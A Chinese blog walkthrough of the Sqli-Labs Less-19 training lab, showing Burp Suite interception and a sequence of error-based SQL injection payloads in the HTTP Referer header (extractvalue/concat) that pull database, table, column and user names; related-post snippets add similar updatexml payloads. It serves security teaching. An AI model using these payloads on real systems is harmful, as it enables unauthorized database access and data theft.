Less-19 【Referer】

最新推荐文章于 2024-04-02 17:36:01 发布
最新推荐文章于 2024-04-02 17:36:01 发布
阅读量229 收藏
点赞数
分类专栏: Sqli-Labs 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45939134/article/details/130780963
版权
文章详细介绍了如何通过设置代理、使用BurpSuite抓包来分析HTTP请求,进而实施SQL注入攻击,包括重放攻击、寻找注入点、分析报错信息、绕过Referer限制以及从错误信息中获取数据库信息等步骤。最后,展示了如何获取数据库名、表名、字段名以及数据,提到了sqlmap工具的使用。
摘要由CSDN通过智能技术生成

目录

第十九关

1、设置代理

查看BP的代理

查看浏览器代理

2、使用BP抓包

3、重放攻击

4、寻找注入点

5、分析报错信息

6、绕过Referer

7、异常报错

8、获取所有数据库名

9、获取当前数据库名

10、获取security数据库下的所有数据表

11、获取security数据库下users表中所有字段名

12、获取users表中username字段下第一个数据,以第0位为起点向后推进1位(不包括0)

第十九关

我们发现在不管那个文本框输入各种的符号都没有用。

这时候我们就可以分析它的HTTP请求包来进行攻击。

1、设置代理

查看BP的代理

查看浏览器代理

如果"例如:"后面的字不一致请做以下设置

在文本框中输入network.proxy.allow_hijacking_localhost然后把false改成true

2、使用BP抓包

切换到浏览器我们输入账号密码然后点击Submit,然后我们打开BP就会发现已经抓取的HTTP请求包。

3、重放攻击

我们按以下Ctrl+R键,然后点击Repeater查看我们传送过来的请求包

点击Go查看一下正常页面

4、寻找注入点

上一关我们试了试User-Agent,这次我们试Referer,还是加一个单引号。

5、分析报错信息

关键信息:'127.0.0.1')'

分析它的闭合方式是('Referter','IP')

6、绕过Referer

Referer: 1',1) -- +

7、异常报错

Referer只是一个特殊的字符串,所以我们去判断字段数,因为没有信息,所以提供报错。

这时候我们就可以使用异常报错的方式来获取我们想要的信息

8、获取所有数据库名

因为它报错回显的字符数量有限,所以我们需要更改1,32的1,以第1位开始往后32位的字符(其中包括第1位)

Referer: 1',extractvalue(1,concat(0x7e,substr((select binary(group_concat(schema_name)) from information_schema.schemata),1,32),0x7e))) -- +

9、获取当前数据库名

Referer: 1',extractvalue(1,concat(0x7e,(select database())))) -- +

10、获取security数据库下的所有数据表

Referer: 1',extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))) -- +

11、获取security数据库下users表中所有字段名

Referer: 1',extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e))) -- +

12、获取users表中username字段下第一个数据,以第0位为起点向后推进1位(不包括0)

Referer: 1',extractvalue(1,concat(0x7e,(select * from (select username from users limit 0,1) a),0x7e))) -- +

我们逐步去拿数据,其中可能会比较浪费时间,可以选择用sqlmap工具。

到此闯关完成,闯关结束。

'tubug'
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Sqli-labs靶场第19关详解[Sqli-labs-less-19]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 712
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。
SQLi LABS Less-19 报错注入
热门推荐
wangyuxiang946的博客
08-14 1万+
sqlilibs19,SQLI-LABS第十九关,sqli-labs十九关 但后面插入HTTP Referer时,并没有对参数进行过滤,我们可以从Referer入手 首先,输入正确的账号和密码,只有账号和密码都正确,才能操作Referer 然后使用代理软件(Burp Suite)拦截POST请求,修改Referer的参数,页面出现了报错信息,接下来即可使用报错注入进行脱库 1' and updatexml(1,0x7e,1) and ' 获...
sqli-labs less-19 less-20 less-22
weixin_74182283的博客
04-02 1096
由于上述所说的cookie原理,一开始是不会有cookie信息的,但登录后,就会自动出现一则cookie信息。' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) or '1'='1 通过报错注入的函数,对其进行攻击,成功得到数据库信息。' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) or '1'='1 通过报错注入的函数,对其进行攻击,成功得到数据库信息。
sqli_labs less-19referer注入)
niuniu1996的博客
10-15 882
账户密码一样 bp抓包 修改referer 此处报错是inseret语句 所以使用and '1就可以闭合 查询数据库名
Sqlilabs Less-19
Light_inthe_eyes的博客
03-07 146
一顿猜测后,发现在referer后面加入单引号报错,找到注入点 查看源代码中的referer相关的SQL语句: $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')"; 爆库: Referer: http://127.0.0.1/sqlilabs/Less-19/',updatexml(1,concat(0x5c,(select database())),1))# 爆表
sqli-labs/Less-19
m0_71299382的博客
11-18 221
sqli-labs第十九关
Sqli-labs之Less-18和Less-19
→_→
04-12 3342
Less-18 基于错误的用户代理,头部POST注入 (注:这一个模拟的场景是注册登录后的注入) 由题意可知,这又是一种新姿势,老方法,查找注入点,发现前面的方法都未成功。且错误回显与正确回显都显示IP: 这里写说几个常用请求头:(上一篇文章详细讲过) Host ...
Less19 (referer注入)
老司机开代码的博客
08-03 1717
文章目录1. 什么是referer?2. 分析题目3. 手工注入4. SQLmap注入 1. 什么是referer? 简单讲就是当你访问一个网站的时候,你的浏览器需要告诉服务器你是从哪个地方访问服务器的。(直接输入网址或者其他页面中的链接点进来的)。 之前写过一篇关于referer的文章,不明白的小伙伴可以点击下方链接看一下。 HTTP请求头中的referer字段 2. 分析题目 这关的思路和Less-8几乎是一样的。首先看一下网站源码: $sql="SELECT users.username, user
Sqlmap2021 -- Referer注入
weixin_41489908的博客
07-07 1984
一直向前走,天总会亮的。。。 ---- 网易云热评 一、检测是否存在注入 1、通过BurpSuite抓包,将封包内容保存到referer.txt POST /sqli/Less-19/ HTTP/1.1 Host: 192.168.139.129 Content-Length: 38 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.139.129 Content-Type: a..
sqlilabs less-18 ~ less-19
TA不懒,但还没有添加简介
07-07 292
sqlilabs less-18
VBS伪造HTTP-REFERER的实现方法
09-05
然而,这种方式在访问设置了Referer检查的页面时,返回的结果是"No Referer",说明Referer字段并未成功设置。 接着,作者搜索了关于VBS伪造Referer的信息,发现很多网上资源都是错误的或未经验证的。作者还尝试了...
laravel-referer:记住访问者的原始referer
02-03
如果URL中存在外部主机,则来自请求的Referer标头中的域 空的 支持我们 我们投入了大量资源来创建。 您可以通过来支持我们。 非常感谢您从家乡寄给我们一张明信片,其中提到您使用的是哪个包装。 您可以在上找到...
ruanyf#articles#2019-06-04-HTTP Referer 教程1
07-25
四、rel属性 五、Referrer Policy 的值 六、Referrer Policy 的用法 七、退出页面重定向
ASP,PHP与.NET伪造HTTP-REFERER方法及防止伪造REFERER的方法
10-30
$out .= "Referer: $referer\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); while (!feof($fp)) { echo fgets($fp, 128); } fclose($fp); } ``` #### .NET环境中的HTTP-REFERER伪造 在...
基于Javascript的express-referer防盗链Node.js设计源码
05-23
express-referer是一个基于Javascript开发的防盗链Node.js项目,包含520个文件,其中包括170个JavaScript文件、127个Markdown文件、87个JSON文件、19个TypeScript文件、17个ESLint配置文件、17个YAML文件、12个NYCrc...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8412
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
H为供应链的变革、模式和方法.pdf
最新发布
08-24
H为供应链的变革、模式和方法.pdf
java源码资源很强的Java加密解密算法源码
08-24
java源码资源很强的Java加密解密算法源码提取方式是百度网盘分享地址
五、前后端分离通用权限系统(5)gansu-system-front.zip
08-24
五、前后端分离通用权限系统(5)gansu-system-front.zip
http中的X-Forwarded-For和Referer
05-25
有什么区别? X-Forwarded-For是一个HTTP消息头,用于传递客户端的原始IP地址,在经过代理或负载均衡服务器时可以使用此头。而Referer是一个HTTP消息头,用于标识当前请求的来源页面的URL。简单来说,X-Forwarded-For用于获取客户端的原始IP地址,而Referer用于获取请求来源的URL。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

'tubug'

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值